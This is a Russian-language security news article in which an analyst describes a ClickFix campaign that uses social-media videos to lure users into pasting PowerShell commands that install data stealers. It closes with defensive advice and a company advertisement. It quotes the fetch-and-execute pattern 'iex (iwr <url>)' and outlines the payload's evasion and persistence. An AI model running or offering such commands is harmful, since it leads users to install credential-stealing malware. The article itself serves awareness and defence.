Цифры говорят
Эксперт Ирина Дмитриева: ClickFix-атаки переживают внеочередной ренессанс
17.04.2026 |
Изображение: Газинформсервис
«Реальность мира кибербезопасности показывает на практических примерах, что всё новое — это хорошо забытое старое», — констатирует Ирина Дмитриева, эксперт в области кибербезопасности и аналитик компании «Газинформсервис». Она объяснила, что именно так в ландшафт киберугроз вновь врываются атаки класса ClickFix («исправление через нажатие»). Это атаки, при которых жертва не скачивает исполняемый файл, а самостоятельно вводит безобидный на вид код в командную строку, который запускает каскад вредоносной активности на устройстве. Зачастую пользователь совершает такие манипуляции с целью «бесплатной» активации лицензионного продукта или дополнительной настройки Windows.
«Стабильно мутирующий и возвращающийся из забытия ClickFix гуляет по социальным сетям, форумам и поисковым системам. Вредоносные инструкции для “активации” распространяются в виде рекламных предложений, эксплуатируя алгоритмы рекомендаций. Злоумышленники размещают “технические гайды” на платформах через всеми предпочитаемые форматы коротких легких роликов. Темы подбираются под повышенный пользовательский спрос: разблокировка премиум-функций у платных стриминговых сервисов, активация Microsoft Office, установка плагинов для Adobe Acrobat, получение доступа к платным функциям нейросетей Cursor и ChatGPT. Подобные ролики уже набрали миллионы просмотров в социальных сетях, что расширяет охват, распространяя вредоносные инструкции по сарафанному радио», — подчеркнула эксперт.
В одном из зафиксированных случаев жертва, увлекавшаяся кастомизацией клиента Spotify через легальный инструмент Spicetify, стала лёгкой добычей видео, обещавшего «бесплатный Premium».
Механика заражения предполагает, что жертва, ознакомившись с видеоинструкцией, откроет PowerShell и выполнит короткую команду формата: iex (iwr <url>). Особенность данной команды — выполнение вредоносного скрипта только в том случае, если в User-Agent указано «PowerShell». Для правдоподобности в тексте URL-адреса используются короткие домены с путями /windows или /office. Первичный скрипт проводит обширную работу: тщательно проверяет среду на наличие песочниц и виртуальных машин, прячется от Microsoft Defender, а в отдельных случаях закрепляется в системе через ключи реестра Run или планировщик задач. Во многих случаях первичный скрипт перенаправляет на дополнительный URL-адрес, с которого загружается основная вредоносная нагрузка.
«Конечная цель кампании — кража данных, которая достигается через популярные стилеры Vidar, StealC и AuraStealer», — акцентировала внимание Ирина Дмитриева.
Она добавила, что, несмотря на кажущуюся ориентированность на частных пользователей, практика уже показала, что ClickFix несет прямые риски для корпоративной среды. Использование личных аккаунтов на рабочих устройствах для развлекательного контента ставит под угрозу безопасность всей инфраструктуры компании. Реализация вектора атаки, при котором сотрудник вводит “безобидную” команду PowerShell для бесплатного прослушивания музыки, может попросту открыть злоумышленникам путь во внутреннюю инфраструктуру.
Противодействие атакам класса ClickFix требует проведения работы внутри корпоративной структуры. Безусловное ограничение на инфраструктурном уровне расширенных прав доступа на скачивание сторонних приложений, ограничение доступа к развлекательным ресурсам и запрет на запуск PowerShell позволят снизить часть рисков. В данном случае также стоит уделить внимание индикаторам компрометации, которые выявили исследователи. Но для поддержания стойкой многорубежной защиты от кибератак может прийти на помощь GSOC компании «Газинформсервис». Аналитики обеспечивают проактивную защиту в тех случаях, когда требуется анализ телеметрии, корреляция скрытых угроз с глобальными данными TI и реагирование на угрозы в реальном времени.
